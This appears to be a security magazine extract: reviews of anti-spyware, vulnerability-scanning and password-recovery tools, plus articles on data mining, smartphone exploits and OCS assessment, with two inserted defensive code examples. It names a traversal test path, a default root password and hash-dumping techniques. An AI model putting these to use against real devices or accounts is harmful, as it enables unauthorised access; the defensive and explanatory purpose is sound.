You are able to schedule scans on your machine, just like your anti-virus, and you're able to create whitelists and blacklists of your files, to prevent you being prompted to remove the same files all the time (if you feel that you are safe to keep them). 

There is a lot of chatter about this product (and others by Avanquest) on various forums concerning the validity of its claim to be the number 1 most effective in head-to-head tests. It uses Sunbelt's VIPRE (Engine A) plus Outpost AntiSpyware combined with the Virus Buster SDK (Engine B) as its scanners, and individually they have both performed very well in their respective tests. Even though I was using a quite old laptop, I didn't notice any real performance drop whilst scanning and surfing at the same time. Overall I liked the product, as it would save me time from having to unload one of my current anti-spy programs to then run another on a manual scan. 
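Two of the Spycar categories the review walks through, autostart entries under the Run keys and hosts-file changes, are easy to audit by hand as well. The script below is an added example, not Avanquest's or Spycar's code: it runs simple heuristics over a constructed registry export and a constructed hosts file (the writable-directory pattern and the loopback allowlist are assumptions, not anything the product documents).

```python
"""Added example (not Avanquest's or Spycar's code): an offline audit of two of
the locations the review says Double Anti-Spy watches, the Run autostart keys
and the hosts file. All input below is constructed sample data."""
import re
from dataclasses import dataclass

# Autostart keys named in the review (HKLM and HKCU ...\CurrentVersion\Run).
RUN_KEYS = (
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
)
# Heuristic (assumption): autostart commands launched from user-writable scratch
# directories deserve review; installed software normally lives under Program Files.
WRITABLE_DIRS = re.compile(r"\\(temp|tmp|downloads)\\", re.IGNORECASE)
# Mappings every Windows hosts file legitimately carries (assumed allowlist).
DEFAULT_HOSTS = {("127.0.0.1", "localhost"), ("::1", "localhost")}


@dataclass(frozen=True)
class Finding:
    location: str   # registry key or "hosts"
    detail: str     # human-readable description of the entry


def audit_run_entries(entries):
    """entries: iterable of (key, value_name, command) tuples as exported from
    the registry. Returns a Finding for each suspicious autostart command."""
    findings = []
    for key, name, command in entries:
        if key in RUN_KEYS and WRITABLE_DIRS.search(command):
            findings.append(Finding(key, f"{name} -> {command}"))
    return findings


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, ignoring comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for host in names:
            yield ip, host.lower()


def audit_hosts(text):
    """Every mapping beyond the default loopback entries is reported: a vendor
    or update domain pointed elsewhere is the hosts-file change that the
    review's network configuration test simulates."""
    return [Finding("hosts", f"{host} -> {ip}")
            for ip, host in parse_hosts(text)
            if (ip, host) not in DEFAULT_HOSTS]


# Constructed sample registry export: one normal entry, one dropped in %TEMP%,
# and one under a key that is not an autostart location.
SAMPLE_RUN_ENTRIES = [
    (RUN_KEYS[0], "SecurityHealth", r"C:\Program Files\Vendor\agent.exe"),
    (RUN_KEYS[1], "updater", r"C:\Users\alice\AppData\Local\Temp\updater.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer", "x",
     r"C:\Temp\ignored.exe"),
]

# Constructed sample hosts file: the defaults plus one redirected update domain.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
198.51.100.23   update.example-av.invalid   # injected by the test page
"""

if __name__ == "__main__":
    for f in audit_run_entries(SAMPLE_RUN_ENTRIES) + audit_hosts(SAMPLE_HOSTS):
        print(f"[{f.location}] {f.detail}")
```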
Web Site Security Audit 



Trying to review a product that has no software to download and nothing to install was a new concept to me, but it was a very pleasant experience. 

Setting up the Web Site Security Audit has to be one of the easiest processes to go through. You literally complete an online form for your email and password, and other contact details. Every level of service is available on an initial 15 day trial, which is more than enough to enable you to see how useful this solution really is. 

Once I logged into the site, I was given a simple menu to navigate (Image 1) and was immediately presented with the results of the last scan that was completed (Image 2). 



[Image 1: the site menu (Latest Scan Results, My Account, Web Site Testing, Security Seal, Contact, News). Image 2: the last scan result, with Test ID and Recommended Solution columns, showing Secure Site, 12-Nov-2009.] 

The full audit result is clear and concise. You are provided with the vulnerability scan results with a total score shown and then a grading (A, B etc). The summary is broken down into High, Medium and Low areas; by clicking on the details in this section, you are jumped to further down the web page, where the full details of the vulnerability are shown. Each of the vulnerabilities found provides the following information: 

■ Name of the vulnerability 

■ Port in use 

■ Summary 



You have the option to receive notifications when tests have been completed, with a choice of High Risk only, any risks, or whenever a scan completes, and you can have a list of the tests that have been conducted. These notifications basically point you to go to the site to grab the detailed information of the scan that has been completed. 

Even if your customer decides to stop receiving the service from you, all the details are archived while your account is kept live. With over 6,300 remote vulnerabilities, the testing that is being conducted on your site is above and beyond the usual PCI requirements, and they are adding new tests all the time. Once you have completed a test on a site, there is a nice option to offer a link back to a Secure Seal image, which allows your customers to prove that their site is safe from current threats (but you should only allow customers to have this if their score is high enough). 

If you ever have any issues with the product/service there is a contact form built in, and their support is 24/7. I received prompt responses regarding the questions I had concerning the services available. 

I was impressed with the simplicity of the services being offered; once it was configured it is literally fire-and-forget technology, as you don't really need to go back to the site apart from when you want to add more domains to it or to grab the report information for your customers. Having the reports emailed to you in PDF format at the end of the audit was a nice touch, and they were very concise in the details provided, from the test details and the vulnerabilities found through to a full port list of what was scanned and how each port actually responded. 



[Scan Results screenshot: Hostname; Scan date 2009-11-05; Scan Status Done; Vulnerability Score 100.00 (A+); Vulnerability Summary: High 0, Medium 0, Low: MySQL Server Version Detection, 404 check; Total 2.] 

URL: http://www.beyondsecurity.com/vulnerability-scanner.html 
Pricing per month 
Basic: $29.95 
Standard: $59.95 
Advanced: $119.95 
Url: http://www.lostpassword.com/kit-forensic.htm 
Cost: $795 (includes 1 year of updates, after which it is $195 per year) 
Tested on: Gateway Laptop Pentium M 1.73GHz, 1GB RAM, Windows XP SP2 



Passware Kit Forensic 9.5 



Passware Kit Forensic is described as the complete forensic discovery solution, able to find all password-protected files on a machine, and even BitLocker. With over 180 different file types covered for password recovery, version 9.5 now also offers BitLocker decryption and recovery of PGP archives and virtual disks. 

1st Test 

First thing was to run a scan on my machine to see what it could find: 86GB total space with 55GB of it in use, 174,783 files on there with 122 files that are protected. It only took 60 minutes to complete this scan (which isn't the 4,000 per minute which an average PC can achieve according to the website; the actual speed was 2916 files per minute). 

Once the scan was completed you are provided the following: Filename, Folder location, Recovery options, File Type, Document Type (program version), Protection Flags, Date Modified, File Size, MD5 of the file. 

You are also given a complete scan log, which itemizes everything, including the files that were actually skipped. 

The recovery options column provides details on what the actual recovery process would be for that particular file. By clicking on the actual file, you are provided the option in the left-hand column to start the recovery process. Once you click on this option, you are then provided with three further options: Running a Wizard, Use Predefined Settings (use default settings) or Advanced, where you can specify customized settings purely for this file. By starting the Wizard you are requested to try and provide any information that you may have concerning the password itself. By selecting Advanced, you can tailor the attack for this file using the available options: 

■ Basic Attacks - Dictionary, Xieve, Brute Force, Known Password/Part, Previous Passwords 
■ Modifiers - Change Casing, Reverse Password 
■ Combine Attacks - Join Attacks, Append Attacks 

Whilst attacks are running, you are given an estimated time for decryption, ranging from months to minutes. 

2nd Test 

You are given the option to create a portable version for those times when you can't install anything on a machine. This creates all the necessary files in a folder that you have specified. You can then copy this folder to a USB stick, or burn it to a CD/DVD. 

Once it was transferred onto the USB stick, I tried the scanning process on my laptop again, and I did notice that the scanning was noticeably slower this time round. But I still think this is an excellent feature, and it will be staying on my utilities stick. There is no difference in the actual program between the version installed onto a hard drive and the version installed onto a USB stick. 

3rd Test 

You are also given the ability to create a bootable CD for password resetting for Windows 2000, Windows XP and Windows Server 2003, as well as for Windows 7, Vista, and Server 2008, so long as you have the respective setup CD for the operating system. You are given the opportunity to install the respective SCSI or RAID drivers if required at time of creation. I was able to reset the password for all the accounts that were available on my laptop, not just the administrator. 

Extra Information 

You are able to utilize multicore CPUs and nVidia GPUs to speed up the decryption process (up to 3,500 times), as well as being able to use Tableau TCC hardware accelerators (up to 25 times faster). You are also given 20 credits for Passware's online decryption service for Microsoft Word and Excel documents. In the demo version you are given a preview of the file regardless of the password length, and the 20 credits give not only a preview but allow you to save the fully decrypted files. There are some limitations which you need to check out on the website, http://www.lostpassword.com/online-mode.htm 

Every IT department should have a copy of this somewhere. The number of times I have had calls where someone has left the company and the machine has been handed in, only for us to find that the PST file is password protected or there is a password-protected zip file that could contain company information; all you need to do is fire this tool up and very quickly you are likely to have access to the files. I think it will pay for itself the first time you need it, especially when you have a manager screaming "I need the data now!" 
Elcomsoft System Recovery 



ElcomSoft System Recovery will allow you to reset account passwords instantly, as well as giving you the ability to launch an attack on the original passwords. You are able to unlock locked accounts and disabled accounts, from a normal user up to administrator level, for all these operating systems: Windows NT, Windows 2000, Windows XP, Windows Vista, Windows 2003 Server, Windows 2008 Server. 

By providing the installation on a pre-licensed Windows PE environment, it couldn't be easier to use. You can either burn the image to a CD or create a bootable USB stick. Unlike most password recovery solutions, this is a Windows GUI type platform, making it more familiar to most IT users. 

There are three versions of the product available: Basic, Standard and Professional. Only the Professional one is licensed for actual business use. For a comparison of the three different versions, please take a look at http://www.elcomsoft.com/forgot_windows_logon_password.html#chart 

Elcomsoft System Recovery includes built-in drivers for third-party SATA, RAID, and SCSI adapters from the most popular manufacturers, including Intel, NVIDIA, VIA, SiS, Adaptec, Promise, and LSI. For most PCs there is no need to trawl the Internet for the latest drivers; they should already be available on the boot disk. 

Once booted up into the Windows environment, you are asked to select which installation you wish to try and recover the passwords for. Once connected to the Windows system, you will see all the accounts that you are able to edit and make changes to. As I was testing this on my local laptop, I was presented with each of the accounts, and by clicking on each of the accounts I am able to reset the password if I wish to do so, and even escalate the privileges of a normal user account. 

Elcomsoft System Recovery allows you to back up the Windows Registry or Active Directory database onto an external drive for later analysis. You can also dump the password hashes from the SAM/SYSTEM files or from the Active Directory database, and then write them to a text file for further analysis and password recovery. You can get a list of all user accounts (local or from the Active Directory database) and their properties, including Administrator accounts. 

In the wrong hands this tool could be very dangerous, as all someone would need is physical access to your server for approximately 10 minutes and they would be able to dump every single user account off one of your servers; this proves the old phrase that if they have physical access then the machine is theirs. On the support side of things this tool is useful, but if you need to have physical access to the machine then this could cause issues if the IT support department is in one part of the country and the affected system is elsewhere. 

All in all, a good, useful tool to have available. 





URL: http://www.elcomsoft.com/esr.htm 

Price: 
Basic: €49 
Standard: €199 
Professional: €399 
WHAT YOU WILL LEARN... 

The basics of data mining 

Where the data comes from 

How data mining is used for security 

WHAT SHOULD YOU KNOW... 

Basic security terminology 



Data Mining as a Tool for Security 



Given the current state of heightened security across the globe today, the ability to sift through data and search for key information and the occurrence of particular patterns is highly desirable. 

This capability, known as data mining, can be used to pinpoint anything from the seasonal grocery purchasing habits of individuals to the pattern of international telephone calls that might presage an act of terrorism. 

Data mining, simply, is a process that allows large volumes of data to be searched for patterns and relationships in or among sets of data. 

Goals of Data Mining 

Data mining is performed with the return of particular information in mind. In a general sense, the goals of data mining fall into four main categories: 

Prediction 

Data mining can be used in an attempt to predict how certain variables in the data set will behave in the future. This type of analysis is often used in intrusion detection systems. Being able to predict what network traffic will look like on a particular day or at a particular time of day allows security personnel to focus their efforts on the specific areas where unusual activity is noted. 

Discovery 

Patterns within mined data can be used to identify the existence of a given item, event, or activity. In a general sense, password authentication fits within this category. Password authentication determines whether a user is actually a specific user by comparing the attributes that the user presents against the stored attributes held in a database. 

Classification 

Mined data can be partitioned in order to identify classes or categories based on combinations of parameters. Such methods are often used to segment network traffic into 'good' and 'bad', based either on the contents of a particular packet, as is done in simple packet filtering, or on the contents of a packet in context with other traffic, in order to detect more complex behavior such as IP fragmentation attacks. 

Optimization 

Data mining can be used in an effort to optimize the use of resources in a variety of projects. An excellent example of data mining used for this purpose is that of estimating software quality. The task of predicting software faults can be truly daunting, but with data mining techniques and information gathered from a variety of software metrics gathering methods, such faults can be accurately predicted [1]. 

Types of Information Returned by Data Mining 

Data mining can be used as a sort of inductive reasoning, meaning that it can be used to discover previously unknown patterns within data. Four types of data can be returned by data mining: 



Association Rules 

Association rules can be used to correlate the presence of a set of items with another range of values for another set of variables. Association rules are particularly useful when attempting to detect unauthorized activity based on log files. While some events, like the update of a critical system file, may be expected when applying a patch or an update, the same file being updated in the absence of maintenance activity may be an indicator of an attack. 

Classification Hierarchies 

Classification hierarchies work from existing sets of events or transactions to create a hierarchy of classes. One interesting use of this system is present in the Computer Aided Facial Image Inference and Retrieval System (CAFIIR) [2]. CAFIIR is a tool that assists witnesses in identifying suspects from photographs. A classification hierarchy is used to allow the photographs to be ordered by facial features in order to more easily identify individuals. 

Sequential Patterns 

Sequential patterns are patterns where a sequence of events or actions typically happens in a specific order. A motorist with a flat tire will likely follow a sequence similar to the following: 

■ Pull over to the side of the road 
■ Exit the vehicle 
■ Examine the tire 
■ Open the trunk 
■ Retrieve the spare tire 

This sequence of events is unlikely to occur in a different order. When such patterns are discovered, accurate predictions can generally be made regarding future occurrences from any point in the sequence. Sequential pattern analysis is used when examining communications traffic for signs of impending terrorist attacks and has been found to be a reliable indicator of such activity, even clearly indicating past attacks where communications logs were available for analysis afterward. 



Periodicity 

Time series data examines the change of data values over a period of time. Periodicity is used to help predict the behavior of time series data. A very common use for this sort of data is found in tracking the behavior of malware. Data mining, based on time series data, can be used to assist in predicting the occurrence and behavior of malware, and to model it as it spreads. 

Clustering 

A population of events or items can be partitioned into sets of similar events. One example is found in a subset of clustering, known as document clustering. Document clustering, used heavily in information retrieval, text mining, databases, and many other fields, involves grouping similar or related documents together. This allows documents to be more easily searched by related topics and greatly speeds the effort of searching for particular information. 

Where Does the Data Come From? 

The supply of fodder for data mining can come from a variety of sources, as nearly every move made in the modern world has an associated record of some sort. Even when deliberately attempting to minimize the production of such records, individuals are still registered in multiple systems daily unless they have dropped completely off the grid. Taking privacy measures to this extent is untenable to most people. 

Purchase Records 

Purchase records are a very rich source of data for data mining purposes. Making a very data-rich situation even richer is the trend in the last few years toward loyalty cards or membership cards. These cards, in place in many large retail chains and grocery stores, give discounts to customers while allowing the retailer to track the customer's purchase history at an even more granular level. This data can be used to create a profile on customers over a period of time, becoming more accurate with each purchase [3]. 



Travel Records 

When traveling by car, it is possible to track the route by purchase patterns. If only cash is used for gas purchases and a cell phone is not used, then an individual can travel freely without being tracked. When traveling by air, however, data is always generated regarding time of departure, destination, and length of stay. This information was requested from the airlines by the government recently in an attempt to track terrorists. 

Insurance Records 

Insurance companies make a business out of risk management. For these companies to be profitable they must take in more money in the form of premiums than they pay out in claims. Insurance companies base premium pricing on the level of risk, and that risk can be computed more accurately if more information is known about the potential customer. Gerver and Barrett point out that "Plan sponsors can reduce or avoid future health care costs by at least 5% or 10% annually through the use of evidence-based data mining technology" [4]. Customers are required to fill out applications for insurance and in doing so provide obvious data such as name, address and so on. This information can be used with data mining techniques to gather other information about a potential customer, such as the sports that they engage in or medical ailments they might have. 

Communications Records 

Communications are another very rich source of information to be mined. The US National Security Agency (NSA) began collecting and mining phone call records shortly after the September 11th terrorist attacks on the World Trade Center. These records are examined for particular patterns of calls coming into and going out of the country, a possible indicator of terrorist activity [5]. 

A bill recently introduced to the US House of Representatives would require Internet Service Providers (ISPs) to keep records of users' internet usage, including web browsing, Instant Messenger (IM) conversations, and email, potentially indefinitely [6]. Such a massive store of data would enable data mining on a scale that would make current efforts pale in comparison. 

Most web site visits are tracked. Through the use of cookies, it is possible to track individuals across multiple sites. Advertising companies such as DoubleClick (now owned by Google) make a business of tracking web site visits by individuals. 

Credit History 

In the 1960s, automated credit scoring came into use. This allowed the consumer's credit data to be mined in order to create an overall 'score' of the customer's credit worthiness. 

One of the most commonly known sources of personal information in the United States is the data housed by the credit bureaus. The main credit bureaus in the US are Equifax, Experian, and TransUnion. The credit bureaus keep data on all of our credit activities. This includes home mortgages, car and student loans, and all of our credit card payment activity. Credit reports on individuals are trivially easy to obtain and can be purchased on the internet for a small fee. 

Medical Records 

A patient's medical information can be legally mined by insurance companies, doctors, hospitals, and other related industries. This information, containing everything from clinic visits to information on surgeries, provides a vast wealth of information. This is one of the few areas in most countries where the patient's private data is offered some sort of legal protection. 

Government Records 

In the United States, the FBI has been building a national DNA database since 1990. According to data on the FBI's web site, the database contained 7,261,604 profiles as of September 2009 [7]. Under the DNA Identification Act of 1994, the FBI was authorized to create a national DNA database for law enforcement purposes. Local and state police contribute data from criminals to this database. Its purpose is to enable DNA evidence at crime scenes to be matched quickly to a person. At the present time only convicted criminals are forced to provide DNA samples. There is no law that forces suspects to contribute their DNA, but such a law is possibly coming. If passed, anyone taken into custody might be required to provide a DNA sample. 

In the United Kingdom, the UK National Criminal Intelligence Database (NDNAD) has been constructed, against which the FBI's database pales in comparison. The UK collects DNA from samples at crime scenes, anyone detained at a police station (charged or otherwise), anyone participating in a recordable offense, anyone convicted of certain crimes before the establishment of the database, and the deceased. DNA samples can legally be collected with or without the consent of the individual, by force if necessary [8]. As of March 2009 the NDNAD contained 5,208,988 profiles [9], with the UK at a population nearly 1/5 that of the United States. 

Data Mining for Security 

With such a rich set of data to work from, data mining is frequently performed in the name of security. These uses range from security efforts regarding individuals to the internal functions of network security devices. 

Casinos 

Casinos make money based on computed odds. If a customer can find a way to tip the odds in their favor they stand to make substantial gains. Jeff Jonas founded Systems Research & Development (SRD) to help businesses solve difficult problems using data mining techniques. Quite a bit of Jonas' early work was spent helping hospitals identify patients who were trying to avoid payment by slightly changing the name under which they registered [10]. 

Casinos use SRD's products to match lists of people taken from multiple sources against anyone who applies for a job or is currently or was previously employed by the casino. By using Jonas' matching algorithms, the casinos can avoid employing people who might have criminal or suspicious backgrounds. 

Such systems are also used to track cheaters and card counters and share this information between different establishments. 

Government 

The government of the United States is investing heavily in data mining technology as part of its war on terror and for various other purposes. In 2004, the Government Accounting Office identified 199 separate government data mining operations [11]. A significant number of these operations involved the use of personal information. 

More recently the US government has employed data mining techniques to detect fraudulent claims after hurricanes Katrina and Rita [12]. Some of the data mining work done to detect fraudulent claims is similar to the work that casino owners are doing in order to avoid employing criminals and other undesirables. In the case of the fraudulent claims, the government was particularly interested in detecting multiple claims. 

Possibly the highest visibility government data mining operation has been its attempt to determine if an airline passenger poses a potential threat. The Computer-Assisted Passenger Prescreening System II (CAPPS II) used data mining techniques applied to large amounts of airline passenger information (obtained by the government's contractor with the airlines) to attempt to match passengers to wanted lists. This particular use of data mining met with considerable public resistance as consumers discovered that their personal information had been given to the government for testing of this system, and it was dismantled by President Bush. CAPPS II is now slated to be replaced by the Secure Flight system in 2010, a system that shares a great many similarities, both positive and negative. 

Background Checks 

Despite the detail an applicant might provide in a resume, a potential employer would be remiss if they did not investigate candidates more thoroughly. By using data mining techniques, employers can find out a lot about a potential employee. The most rudimentary form of data mining is to simply type the person's name into Google and scan through the results. More sophisticated techniques can provide a wealth of information that may help make a decision on the suitability of the candidate, and an entire industry exists to serve such needs. 

Network Security Appliances 
and Anti-Malware products 

As mentioned briefly earlier, data mining provides a valuable tool for use in host and network security applications. Various techniques can be utilized in intrusion detection systems, firewalls, and even simple routers to ensure that malformed or malicious traffic is quickly filtered from the network. 

When examining intrusion detection systems and anti-malware products from a data mining standpoint, both are similar efforts and use similar techniques. In such systems, data mining efforts are generally categorized as either misuse detection or as anomaly detection. 

Misuse detection searches for 
patterns of attack based on an existing 
signature of the attack. As with most 
signature based systems, this type 
of detection is very limited, as it is not 
capable of detecting attacks for which it 
does not have a signature. 

Anomaly detection works from a baseline of normal behavior and looks for significant deviation from the baseline. In theory, anything deviating by a certain amount from the baseline should be considered an attack, but this method is prone to false positives. 

In many products, misuse detection and anomaly detection are used in combination to provide the most coverage. 

Software Security 

With the broad acceptance of open source software and the reuse of open source code, it becomes important to know what the code is actually doing. When a vendor ships a product based around a large body of code that it did not create, such as an open source database or web server, the task of validating that the code is not performing any malicious activity can be daunting, at best. Data mining techniques can be used to evaluate the code itself, in an attempt to locate programming techniques that indicate poor or lacking security, or can be used to look for actual malicious segments of code. Several commercial tools exist that can perform these types of functions. 

Privacy Issues 

A great deal of data mining is based on 
databases of personal information such 
as purchases made at stores, travel plans, 
hobbies and medical records. 

Who should have access to a person's personal information? How much personal information should they have access to? The medical and legal professions deal with client confidentiality all the time because doctors and lawyers are privy to personal information that they need to know in order to perform a service on behalf of the patient. In the modern world, much of this information is held in digital form, allowing it to be easily read, edited, copied and sent to third parties. If such data is held in a shared database, is it possible to ensure that someone other than an authorized doctor or lawyer does not have a way to read it? 

Along with the confidentiality of personal data lies its integrity. Obviously it is not desirable to allow just anyone to read private medical records, and it is certainly important to prevent anyone from being able to alter these records other than to add legitimate new material. Assuring the integrity of personal data is difficult because individuals are generally not the holder of the information. Such data is held on behalf of individuals by credit rating companies, banks, doctors, lawyers and others. 

Accuracy of Data 

The accuracy of personal data stored by 
any organization can be of considerable 
importance to the individual. 

Probably the best known problem in the US is incorrect data in an individual's credit report caused by something as trivial as a data entry error: a bounced check or other problem that is attributed to the wrong person. Even though that data is incorrect, proving that it is so and getting it amended becomes the responsibility of the affected individual. Families with several living persons having the same name are also prone to inaccurate credit reporting because data gets associated with the wrong family member. 

The US government's recent attempts to locate terrorists by inspecting airline manifests and so on rely on having accurate data. If an individual is unfortunate enough to have a name or address similar to a known terrorist, they might find themselves denied access to a flight. The data is inaccurate - the person is not a terrorist, yet the data available to the security officials indicates that they are. 

Transcription of hand-written data to computerized form is prone to errors. Consider that many patient records created by personal doctors or those doctors working in hospitals are often written by hand. When these are transcribed to a digital form, small errors in the data could have several outcomes including: 

- Being billed for the treatment of another patient 
- Being issued the incorrect medication or dosage 
- Undergoing the wrong procedure entirely 

These types of errors in medical data can be unpleasant at the very least, if not fatal. 

Conclusion 

The ability of modern computer systems to efficiently sift through very large amounts of data quickly has enabled the use of data mining in a wide variety of application domains. Data mining is now used to identify potential terrorists and other criminals, project sales patterns in retail stores and predict the course of the weather. An enormous amount of data is now available regarding businesses and individuals, and this volume of information is increasing at an amazingly fast pace. By using data mining to gather information from multiple disparate sources, it is possible to correlate what is apparently unrelated data and to come to significant conclusions in near real-time. Data mining currently plays an increasingly important role in security, business and our personal lives, and will continue to do so for the foreseeable future. 
Difficulty 

WHAT YOU WILL LEARN... 

Gain an overview of recent attacks on smartphones 

WHAT SHOULD YOU KNOW... 

Basic understanding of smartphones. 

Movement on the Mobile Exploit Front 



It did not take an industry expert to verify predictions of an ever- 
increasing amount of vulnerabilities in device software: Nokia's 
Curse of Silence issue should have convinced even the most 
stubborn of do-gooders. 



This article provides you with a short list of 
problems which have occurred recently and 
should give you a preview of things you can 
look forward to. 

But Nobody Uses a Console to 
Access Bluetooth FTP 

Our first vulnerability is related to Windows Mobile, or rather specifically to HTC's Windows Mobile devices and their BT-FTP service. This Chinese manufacturer has the habit of enhancing Microsoft's rather crappy Bluetooth stack with an application to handle an additional service called Bluetooth FTP (see Figure 1). 

BT FTP allows other Bluetooth devices to 
access/modify parts of the local filesystem 
(usually a subfolder of the My Documents 
folder) of the device offering the service as if the 
device was offering an FTP server (see 
Figure 2). 

Good-mannered clients understand which folder is considered the root one, and do not allow users to traverse above it. Unfortunately a Spanish hacker, Moreno Tablado, used a terminal connection on a Linux box to try just that - and got access to the device's root directory (and, incidentally, also the /windows/ folder containing important system files). 

Individuals with little more than a basic understanding of Windows Mobile can then attack the handset using this little jailbreak. The possibilities are endless and range from mundane things like accessing private files to outright devious things like installing a program which calls 0900 numbers and generates revenue for the attacker. 

The only reason why this issue did not 
become more significant was that access to BT 
FTP was limited to paired devices: if users are 
careful with whom they pair their phones, they are 
safe. 
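The root of the problem above is that the share root was enforced by the client, not by the server. What a server-side root check looks like, as an added example (not HTC's or Microsoft's code): a simplified Python model of an OBEX FTP share where every SETPATH and every file name is resolved against the share root on the server side, and any move above the root is refused. The folder names are assumptions.

```python
import posixpath


class ObexShare:
    """Simplified server-side model of a Bluetooth (OBEX) FTP share.

    The client is never trusted to stay below the root: every SETPATH
    ("go up" or "go into <name>") and every file name is resolved here,
    and anything that would leave the root folder is refused. Constructed
    example, not the code of any real Bluetooth stack.
    """

    def __init__(self, root):
        # Windows Mobile paths use backslashes; normalise to one separator once.
        self.root = posixpath.normpath(root.replace("\\", "/"))
        self.cwd = self.root

    def _confine(self, candidate):
        """Return the normalised path if it lies inside the root, else None."""
        candidate = posixpath.normpath(candidate.replace("\\", "/"))
        if "\x00" in candidate:
            return None
        if candidate == self.root or candidate.startswith(self.root + "/"):
            return candidate
        return None

    def setpath(self, name="", parent=False):
        """Model of OBEX SETPATH: parent=True moves up one level, otherwise
        move into the child folder `name`. Returns True on success; on a
        refused move the current folder is left unchanged (a real server
        would answer with an OBEX Forbidden response)."""
        if parent:
            target = posixpath.dirname(self.cwd)
        else:
            target = posixpath.join(self.cwd, name.replace("\\", "/"))
        confined = self._confine(target)
        if confined is None:
            return False
        self.cwd = confined
        return True

    def resolve(self, name):
        """Resolve a file name from GET/PUT relative to the current folder,
        or return None when it would escape the share (e.g. ..\\..\\windows)."""
        return self._confine(posixpath.join(self.cwd, name.replace("\\", "/")))


if __name__ == "__main__":
    # Constructed share root, roughly where a BT FTP share would live.
    share = ObexShare("\\My Documents\\Bluetooth Share")
    print(share.resolve("notes.txt"))                    # inside the share
    print(share.resolve("..\\..\\windows\\system.ini"))  # traversal: None
    print(share.setpath(parent=True))                    # above root: False
```

Note that an absolute name such as `/windows/system.ini` is refused too, since `posixpath.join` discards the current folder for absolute paths and the result then lies outside the root.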

Carelessness is not limited to HTC. This Black Hat conference saw the unveiling of yet another large-scale vulnerability which affected handsets running different operating systems and - incidentally - was discovered by fuzzing. 

In particular it is related to so-called over the air (OTA) provisioning. OTA provisioning is a technology which is applied mainly when it comes to configuring handsets: if somebody wants to use an unlocked/unbranded handset on a carrier's network, the carrier can deploy the necessary settings for things like access point names (APNs) via special short message service (SMS) messages which get processed by the handset. 

On Android, Apple iOS and Windows Mobile, vulnerabilities were discovered (but not disclosed, as many of them were unpatched as of the presentation). As of now, all these do is cause DoS conditions on the victim's handset - however, at least some of the vulnerabilities definitely have the potential to allow for the execution of random executables downloaded from the network without user intervention. 



Fools and root rights 

The final issue which deserves coverage 
in this smorgasbord of topics is the 
recently-emerged variety of iPhone 
worms. 

Users who wish to use pirated software or tether for free must jailbreak their device, and often happen to set up an SSH server in the process. Unfortunately the creator of the SSH package forgot to force users to change the default root password (which, incidentally, is alpine) - which has graced us with literally thousands of always-on devices which can be rooted by anyone who happens to know the IP address. 

Various black-hat hackers have since taken to port scanning a carrier's network, and then attacking vulnerable devices. So far, all we have seen is nagware and changed display backgrounds - but in my humble opinion it is but a question of time until more dangerous things will pop up. 

Figure 1. The BT FTP service sits on top of the Bluetooth stack (layers shown: Applications, HTC BT FTP, Microsoft's Bluetooth stack) 

Figure 2. Using Resco Explorer on a Palm OS device to access a Windows Mobile box (image from http://tamspalm.tamoggemon.com) 

Conclusion 

All of the exploits and security issues 
mentioned in this article are due to 
plain carelessness on the responsible 
programmer's end. Had they been aware 
of the most basic elements of security, 
these would have never happened. 

Unfortunately, developers working for 
carriers and device manufacturers still 
see security as an afterthought. Their 
thinking goes along the lines of nobody 
bothered to perform large-scale attacks 
on us so far, so why should they do so 
now? 

Pairing this attitude with a total lack of security-related training opens up a potential minefield as smartphone platforms get more and more popular. Folks: expect more casualties from this front soon... 

Further Reading 

http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html 

http://www.blackhat.com/presentations/bh-usa-09/MILLER/BHUSA09-Miller-FuzzingPhone-SLIDES.pdf 

http://www.blackhat.com/presentations/bh-usa-09/LACKEY/BHUSA09-Lackey-AttackingSMS-SLIDES.pdf 
Difficulty 

WHAT YOU WILL LEARN... 

At the end of this article users will be able to successfully assess the security posture of their OCS 

WHAT SHOULD YOU KNOW... 

Reader is expected to be a user of Microsoft Office Communication Server and familiar with its features 

Assessing Microsoft Office Communication Server R1/R2 with OAT 

The mantra of any good security engineer is: 'Security is not a product, but a process.' It's more than designing strong cryptography into a system; it's designing the entire system such that all security measures, including cryptography, work together. 
- Bruce Schneier 



Continuous education and awareness about the advantages of penetration testing and vulnerability assessment services has finally led enterprises to allocate yearly budgets for their security audits. However, these security audits are limited to enterprise data networks only, which leaves Voice over IP (VoIP) networks insecure. 

Looking at the benefits like lower phone bills, 
virtual offices, centralized management and rapid 
deployment, many enterprises have already adopted 
Unified Communication (UC) infrastructures. 

With the advent of new technologies, VoIP introduces new security risks and new opportunities for attack. Inheriting from both networks and telephony, VoIP is subject to security issues arising from both areas which need to be addressed. 

This article elucidates the need for vulnerability assessment in UC infrastructure along with an introduction to a unique, first of its kind, free security assessment tool for Microsoft Office Communication Server (OCS). 

Pre-requisites: Readers must have a basic understanding of VoIP and protocols like SIP, RTP, etc. 

By the end of this article, readers will be able to identify security risks in their OCS deployments and to effectively audit the security posture of those deployments. Before we go any further, let's understand what Unified Communication is. 




Figure 1. Unified Communication - Getting acquainted with Unified Communication 






To put it in plain words, Unified Communication is the integration of real time communication services such as instant messaging, presence information, IP telephony, video conferencing etc. with non real time communication services like unified messaging. Now the question arises: what exactly is unified messaging? 

Well, unified messaging is the assimilation of electronic messaging and communication media like email, SMS, fax, voicemail etc. into a single interface which can be accessed from a variety of different devices like wireline and wireless phones, computers etc. 

Microsoft Office Communication Server R1/R2 

OCS is one of the cornerstones of 
Microsoft's revolutionary software 
based UC solution and is the platform 
for presence, instant messaging, 
conferencing, and enterprise voice for 
businesses around the world. 

OCS helps to streamline communications between people and organizations. It brings together e-mail, calendaring, voice mail, IM, presence, VoIP audio, video, and Web conferencing. OCS also allows IT administrators to effectively meet challenges like cost control, integration with existing infrastructure, and compliance requirements. 

Considering the benefits provided by OCS, companies like Intel, Shell, Credit Agricole, Lionbridge and others have already deployed the MS UC solution. Microsoft, being the big fish, has always been subject to analysis and scrutiny of its products by security professionals and crackers. 

Over the years, they discovered loopholes and succeeded in exploiting them; what is striking, however, is how they could have spared OCS. 

